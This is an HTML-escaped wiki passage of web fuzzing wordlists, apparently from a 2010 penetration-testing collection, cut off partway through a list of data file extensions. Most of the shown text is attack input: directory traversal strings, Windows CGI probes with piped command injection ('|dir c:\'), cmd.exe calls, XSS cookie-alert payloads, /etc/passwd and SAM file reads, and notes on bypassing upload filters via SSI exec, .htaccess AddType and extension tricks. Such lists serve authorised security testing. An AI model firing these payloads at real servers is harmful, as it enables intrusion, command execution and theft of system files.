.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010 &lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# PHP-Specific File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends  (Update: 17 March 2010) &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
